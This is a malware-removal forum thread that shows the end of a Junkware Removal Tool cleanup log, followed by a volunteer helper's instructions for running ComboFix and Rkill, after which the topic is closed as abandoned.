Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{D927DD92-FF34-41E5-ADB4-AB2B3E2468C3}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{DB2CF230-D9FE-4B82-BF40-A1164CF58FEF}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{DBC96D0C-93B4-4BF0-8DCF-88952B59807E}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{DBE77DA0-EFDD-4E94-BD44-333442FF48C3}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{DC0487C7-D407-4790-AEE1-27758F54B920}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{DC140D1D-306B-4269-A947-9EDABFCE963B}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{DC3FE15F-8384-48CB-85D6-391D72BC0C17}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{DC46E9E2-81BE-4D35-98A4-4047C4E5BA05}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{DC62D76A-86A1-4908-9231-75B71AD5833E}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{DC721F0D-8598-4424-BEDC-160B7509520A}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{DC9F306F-CB1A-4767-8419-3C1A60F58442}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{DCE45F3D-F8BE-49EE-8F7D-7AFB5CB6AFE8}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{DCED4E0F-3660-4EF0-840D-7AA5A897601A}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{DCF8B892-0F43-45DB-818B-8F2C222BCAC7}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{DE54C49A-044C-448D-A0F3-7BCC47933322}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{DEAF098F-47A7-4D77-938E-28AD9DD68309}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{DEB628E6-13B7-49D8-860B-3D6AB7F3D42C}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{DF34D7BE-9743-40A6-93EC-F48501D66026}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{E17E4003-CC70-4DD8-A60A-2BEB8D536963}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{E28E9EE7-F2D8-4DAE-A8AC-4DA4779FD16E}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{E34F9C3B-8957-4E9A-8E3E-3CBE453C444E}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{E5629802-B620-4335-A722-8FDA2A876199}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{E5980BBC-3B0D-4CBA-B8A3-623B659CF006}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{E7F08E9C-0D39-42F4-92D0-5CC9685B1615}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{E8116D63-25A8-43E8-97FE-82F451509F8D}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{E8409300-1419-47EB-91A8-128D83C08C0C}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{E8CA08D9-5745-4E00-8015-4A85F9EE6B69}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{E8CF4708-B1BE-47C4-BC25-E929DBA9FE19}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{E919D961-F419-4FB1-81FA-C15B56F9604F}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{EA7EE26A-03A1-44C3-B49A-263251E42806}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{EAFBAF0C-1D18-4C46-BDFD-4A41ED965041}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{ED8047DB-6EC6-4CD7-A335-5CF09E685297}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{EDB049A6-5BD1-4B1C-B145-344A1D986808}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{EE43A069-47D0-4BCE-A36A-C83966C2AE06}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{EEB12D9A-BC26-4E6E-AF36-A6A834301795}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{EED0FE14-1695-4578-8A11-245E629444E4}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{EF0EAE7A-0839-4595-B4D2-594000DCBA10}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{F0DC6960-0DC6-4D5B-8306-40BCCA99A619}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{F1F03773-1324-4678-8DAE-4066216AEE2F}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{F288AD47-96D0-4D89-8286-F6F4C073984B}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{F3719B93-73CA-4EF9-AFFD-31B76122E853}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{F39BA9B6-59D4-4D8D-8854-CAF5E8B02950}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{F39BB4FE-4F5E-4C3D-9C85-29E217D4F52C}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{F45218DC-0D82-4856-B09C-F4494CE8A6A9}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{F4690522-8F19-44FB-8298-AB17418A14FD}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{F5857D3F-A6E9-4BC3-B99B-3EEDECD9EE65}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{F696D632-FE83-4C7D-AE78-16B28337EAC5}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{F6E499B0-6F3E-4409-A7ED-EC1038FEB72A}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{F77B3A16-5259-4302-8A47-FBFAB84C06A6}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{F8660A53-6071-4009-897A-A905E6600C6A}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{F8A7AD92-3E35-48B1-B0BD-29BA4420B258}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{F926DCBB-FE7E-429F-B4D4-1C61DAECBF12}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{F9C594EB-C63D-4915-8286-D6CFBCDD4828}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{FA1C50AF-A9CB-40CF-AC04-6499CC9F5E6D}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{FA30E178-6E4C-499F-93C2-D686AC741227}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{FA7EC4C0-7757-452B-92C4-50207CAD7EA3}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{FB23DC02-3F54-4472-9E92-1CA84B80FEF6}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{FB4F5FB5-3453-4E6E-91DA-9432C073D806}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{FB5C9329-CE6D-4EFA-B0A3-B75B3E1DEFE4}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{FC10FDF7-D6A8-4242-A33F-ACC0C272D087}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{FC7C4C5B-E341-4349-B704-49872D644C8F}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{FCA5B3C0-552E-4207-9FCB-8DB05AD1B9D3}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{FD7B081F-36DF-4F97-AB4F-8E2C3A9CC924}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{FDBE36CB-3FF7-4187-8AC5-2EC0EBDF8400}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{FE953552-23F6-460A-B9CA-575B51F9CA55}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{FEA728FE-03E6-4DD2-9128-33E33534C10F}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{FF192522-EEBA-4478-997D-D20E67A8E643}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{FF436103-F3EF-4037-BFAC-75B23ABF03D8}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{FFA3637C-EABC-4EB5-B6F3-2C82010F6404}



~~~ FireFox

Emptied folder: C:\Users\J. Powers\AppData\Roaming\mozilla\firefox\profiles\r7t3wel5.default-1419397623955\minidumps [9 files]



~~~ Chrome


[C:\Users\J. Powers\Appdata\Local\Google\Chrome\User Data\Default\Preferences] - default search provider reset

[C:\Users\J. Powers\Appdata\Local\Google\Chrome\User Data\Default\Preferences] - Extensions Deleted:
ihokndmjeombjojnfkmapfnjeghjohim

[C:\Users\J. Powers\Appdata\Local\Google\Chrome\User Data\Default\Secure Preferences] - default search provider reset

[C:\Users\J. Powers\Appdata\Local\Google\Chrome\User Data\Default\Secure Preferences] - Extensions Deleted:





~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Sat 07/18/2015 at 13:15:38.78
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

 

[Broni]

I'd like to see MBAM log.

 

[Domo124]

Isnt that the log I posted under the Rogue killer log?

 

[Broni]

Yes. Sorry about it

Please download ComboFix from Here, Here or Here to your Desktop.

**Note: In the event you already have Combofix, this is a new version that I need you to download. It is important that it is saved directly to your desktop**

• Never rename Combofix unless instructed.
• Close any open browsers.
• Very Important! Temporarily disable your anti-virus and any anti-malware real-time protection before performing a scan. They can interfere with ComboFix or remove some of its embedded files which may cause "unpredictable results".
• Click on this link to see a list of programs that should be disabled. The list is not all inclusive. If yours is not listed and you don't know how to disable it, please ask.
• Close any open browsers.
• WARNING: Combofix will disconnect your machine from the Internet as soon as it starts
• Please do not attempt to re-connect your machine back to the Internet until Combofix has completely finished.
• If there is no internet connection after running Combofix, then restart your computer to restore back your connection.
  If the connection is not there use restore point you created prior to running Combofix.
• Double click on combofix.exe & follow the prompts.

• 
  NOTE1. If Combofix asks you to install Recovery Console, please allow it.
  NOTE 2. If Combofix asks you to update the program, always do so.

• When finished, it will produce a report for you.
• Please post the "C:\ComboFix.txt"

**Note 1: Do not mouseclick combofix's window while it's running. That may cause it to stall
**Note 2 for AVG and CA Internet Security (Total Defense Internet Security) users: ComboFix will not run until AVG/CA Internet Security is uninstalled as a protective measure against the anti-virus. This is because AVG/CA Internet Security "falsely" detects ComboFix (or its embedded files) as a threat and may remove them resulting in the tool not working correctly which in turn can cause "unpredictable results". Since AVG/CA Internet Security cannot be effectively disabled before running ComboFix, the author recommends you to uninstall AVG/CA Internet Security first.
Use AppRemover to uninstall it: https://www.techspot.com/downloads/5514-appremover.html
We can reinstall it when we're done with CF.
**Note 3: If you receive an error Illegal operation attempted on a registery key that has been marked for deletion, restart computer to fix the issue.
**Note 4: Some infections may take some significant time to be cured. As long as your computer clock is running Combofix is still working. Be patient.


Make sure, you re-enable your security programs, when you're done with Combofix.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

NOTE.
If, for some reason, Combofix refuses to run, try the following...

Delete Combofix file, download fresh one, but rename combofix.exe to your_name.exe BEFORE saving it to your desktop.
Do NOT run it yet.
Download Rkill (courtesy of BleepingComputer.com) to your desktop.
There are 2 different versions. If one of them won't run then download and try to run the other one.
You only need to get one of these to run, not all of them. You may get warnings from your antivirus about this tool, ignore them or shutdown your antivirus.

rKill.exe: http://www.bleepingcomputer.com/download/rkill/dl/10/
iExplore.exe (renamed rKill.exe): http://www.bleepingcomputer.com/download/rkill/dl/11/

Restart computer in safe mode

• Double-click on the Rkill desktop icon to run the tool.
• If using Windows Vista, 7 or 8 right-click on it and choose Run As Administrator.
• A black DOS box will briefly flash and then disappear. This is normal and indicates the tool ran successfully.
• If not, delete the file, then download and use the one provided in Link 2.
• Do not reboot until instructed.
• If the tool does not run from any of the links provided, please let me know.

When the scan is done Notepad will open with rKill.txt log.
NOTE. rKill.txt log will also be present on your desktop.

Once you've gotten one of them to run, immediately run your_name.exe by double clicking on it.

IF you had to run rKill post BOTH logs, rKill.txt and Combofix.txt.

 

[Broni]

Still with me?

 

[Broni]

This topic is marked as abandoned and closed due to inactivity.

This member will NOT be eligible to receive any more help in malware removal forum.